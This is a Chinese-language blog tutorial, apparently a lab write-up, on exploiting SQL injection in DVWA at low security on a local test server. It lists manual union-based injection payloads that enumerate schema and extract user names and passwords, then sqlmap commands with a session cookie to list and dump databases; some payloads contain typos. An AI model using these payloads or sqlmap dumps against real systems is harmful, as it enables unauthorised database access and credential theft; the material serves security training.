dvwa sql注入

dvwa sql (low) 注入

一. 手工注入

  1. 输入1 提交

在这里插入图片描述

  1. 输入1‘ 提交
    在这里插入图片描述

  2. 输入 1 and 1=1提交
    在这里插入图片描述
    4.输入 1 and 1=2提交
    在这里插入图片描述
    由上可以看出是存在注入点的
    sql查询语句: select First name 的列名 and surname 的列名 from 表名 where id的列名 =’w我们输入的id‘

  3. 输入1’ union select 1, databse()#
    在这里插入图片描述

6.输入 1’ union select1,table_name from information_schema.tables where table_name=‘dvwa’#
在这里插入图片描述

7.输入 1‘ union select1, column_name from information_schema.columns where table_name=‘users’#
在这里插入图片描述
8.输入1’ union select1,concat(user,password) from user#
在这里插入图片描述

二.利用sqlmap注入
1.找注入点 先输入1,返回正常
再输入1’ 报错,返回
在这里插入图片描述
可以判断除sql注入漏洞,使用sqlmap进行注入攻击
2. 在命令行中输入python sqlmap.py -u “localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit”
在这里插入图片描述
3.sqlmap got a 302 redirect to ‘http://localhost:82/DVWA-master/login.php’. Do you want to follow? [Y/n]
回答Y

在这里插入图片描述
4.python sqlmap.py -u “localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie “F12→→Console→→document.cookie得到当前页面cookie”
cookie为"security=low; PHPSESSID=971ue9m81hgo1d54e43t4umpj3"
在这里插入图片描述
5.python sqlmap.py -u “~~~” --cookie
–dbs 参数可以得到所有数据库
#available databases [6]:
[] dvwa
[
] information_schema
[] mysql
[
] performance_schema
[] phpmyadmin
[
] test

6.python sqlmap.py -u “~~~” --cookie --current-db
可以得到当前使用的数据库
#current database:‘dvwa’
7.python sqlmap.py -u --cookie --table-D
得到dvwa数据库下的表
8.–columns-T" " -D" "
可以得到dvwa数据库下面的表users下面的columns
9.–dump -C" " -T " "-D " "
可以得到dvwa 数据库 下面的表users 下面的columns的具体值

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值